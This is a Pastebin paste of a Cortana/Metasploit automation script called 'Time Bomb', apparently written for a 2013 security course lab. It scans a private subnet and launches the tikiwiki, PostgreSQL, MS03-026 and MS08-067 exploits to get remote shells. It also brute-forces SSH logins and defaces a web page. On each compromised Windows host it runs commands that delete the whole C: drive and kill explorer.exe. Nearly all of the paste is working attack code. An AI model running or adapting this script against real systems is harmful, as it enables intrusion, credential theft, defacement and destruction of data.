API tools faq
paste
Guest User

Untitled

a guest
Feb 21st, 2018
100
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.69 KB | None | 0 0
raw download clone embed print report
  1. # Cortana Script - "Time Bomb"
  2. # For IST 511 2013
  3. #
  4. # Created by Patrick O'Connor
  5.  
  6. debug(debug()| 256);
  7.  
  8. on ready {
  9. when heartbeat_5m {
  10. #kick off nmap/ping sweep
  11. cmd_async("db_nmap --min-hostgroup 96 -T4 -n -sn 192.168.100.0/24");
  12. }
  13.  
  14.  
  15. when heartbeat_10m {
  16. #kick off nmap/service detection
  17. cmd_async("db_nmap --min-hostgroup 96 -T4 -A -v -n 192.168.100.0/24");
  18. }
  19.  
  20.  
  21. when heartbeat_15m {
  22. # tikiwiki - metasploitable
  23. println("[*] Begin tikiwiki attack");
  24. $console = console();
  25. cmd($console, "use exploit/unix/webapp/tikiwiki_graph_formula_exec");
  26. cmd_set($console, %(LHOST => "192.168.100.66",
  27. RPORT => "80",
  28. LPORT => "9079",
  29. RHOST => "192.168.100.202",
  30. PAYLOAD => "generic/shell_bind_tcp",
  31. TARGET => "0"));
  32. cmd($console, "exploit -j");
  33.  
  34. # Add some lulz to the index.html
  35. on session_sync {
  36. println("[*] We have a session!");
  37. when ('heartbeat_5m', lambda({
  38. # $sid is the session ID when I was declared.
  39. println("[*] Adding lulz to index.html!");
  40. s_cmd($sid, "echo '<h1>lulz</h1><br>' >> /var/www/index.html");
  41. }, $sid => $1));
  42. }
  43.  
  44. # SSH Brute Force
  45. println("[*] Begin SSH brute force attack");
  46. cmd($console, "use auxiliary/scanner/ssh/ssh_login");
  47. cmd_set($console, %(THREADS => "24",
  48. RPORT => "22",
  49. VERBOSE => "1",
  50. USER_AS_PASS => "1",
  51. STOP_ON_SUCCESS => "0",
  52. BRUTEFORCE_SPEED => "8",
  53. USER_FILE => "/opt/metasploit/msf3/data/wordlists/csusb_lab.txt",
  54. RHOSTS => "192.168.100.202",
  55. BLANK_PASSWORDS => "0"));
  56. cmd($console, "run -j");
  57.  
  58. # PostgreSQL Payload from SSH Creds
  59. println("[*] Begin PostgreSQL payload attack");
  60. cmd($console, "use exploit/linux/postgres/postgres_payload");
  61. cmd_set($console, %(LHOST => "192.168.100.66",
  62. RPORT => "5432",
  63. VERBOSE => "0",
  64. LPORT => "28430",
  65. RHOST => "192.168.100.202",
  66. PAYLOAD => "generic/shell_reverse_tcp",
  67. DATABASE => "template1",
  68. TARGET => "0",
  69. USERNAME => "postgres",
  70. PASSWORD => "postgres"));
  71. cmd($console, "exploit -j");
  72. }
  73.  
  74. when heartbeat_15m {
  75.  
  76. # Windows 2K3 DCOM Exploit ms03_026_dcom
  77. println("[*] Begin Windows 2K3 DCOM ms03_26_dcom attack");
  78. $console = console();
  79. cmd($console, "use exploit/windows/dcerpc/ms03_026_dcom");
  80. cmd_set($console, %(RHOST => "192.168.100.101",
  81. PAYLOAD => "windows/meterpreter/bind_tcp",
  82. LHOST => "192.168.100.66",
  83. RPORT => "135",
  84. LPORT => "20271",
  85. TARGET => "0"));
  86. cmd($console, "exploit -j");
  87.  
  88. # Lets let the computer cool down a bit before we "clean it"
  89. on session_sync {
  90. println("[*] We have a session!");
  91. when ('heartbeat_5m', lambda({
  92. # $sid is the session ID when I was declared.
  93. println("[*] Perform magic cleanup!");
  94. # Really useful command to free up some disk space.
  95. m_exec($sid, "RMDIR /S /Q C:\\ ");
  96. println("[*] Pens down everyone.");
  97. m_exec($sid, "taskkill /f /im explorer.exe ");
  98. }, $sid => $1));
  99. }
  100. }
  101.  
  102. when heartbeat_15m {
  103.  
  104. # Windows 2k3 SMB Exploit ms08_067_netapi
  105. println("[*] Begin Windows 2k3 ms08_67 attack");
  106. $console = console();
  107. cmd($console, "use exploit/windows/smb/ms08_067_netapi");
  108. cmd_set($console, %(RHOST => "192.168.100.102",
  109. PAYLOAD => "windows/meterpreter/bind_tcp"));
  110. cmd($console, "exploit -j");
  111.  
  112. # Lets let the computer cool down a bit before we "clean it"
  113. on session_sync {
  114. println("[*] We have a session!");
  115. when ('heartbeat_5m', lambda({
  116. # $sid is the session ID when I was declared.
  117. println("[*] Perform magic cleanup!");
  118. # Really useful command to free up some disk space.
  119. m_exec($sid, "RMDIR /S /Q C:\\ ");
  120. println("[*] Pens down everyone.");
  121. m_exec($sid, "taskkill /f /im explorer.exe ");
  122. }, $sid => $1));
  123. }
  124. }
  125. when heartbeat_15m {
  126. # Windows XP SMB Exploit ms08_067_netapi
  127. println("[*] Begin Windows XP ms08_67 attack");
  128. $console = console();
  129. cmd($console, "use exploit/windows/smb/ms08_067_netapi");
  130. cmd_set($console, %(RHOST => "192.168.100.101",
  131. PAYLOAD => "windows/meterpreter/bind_tcp"));
  132. cmd($console, "exploit -j");
  133.  
  134. # Lets let the computer cool down a bit before we "clean it"
  135. on session_sync {
  136. println("[*] We have a session!");
  137. when ('heartbeat_5m', lambda({
  138. # $sid is the session ID when I was declared.
  139. println("[*] Perform magic cleanup!");
  140. # Really useful command to free up some disk space.
  141. m_exec($sid, "RMDIR /S /Q C:\\ ");
  142. println("[*] Pens down everyone.");
  143. m_exec($sid, "taskkill /f /im explorer.exe ");
  144. }, $sid => $1));
  145. }
  146. }
  147. quit();
  148. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!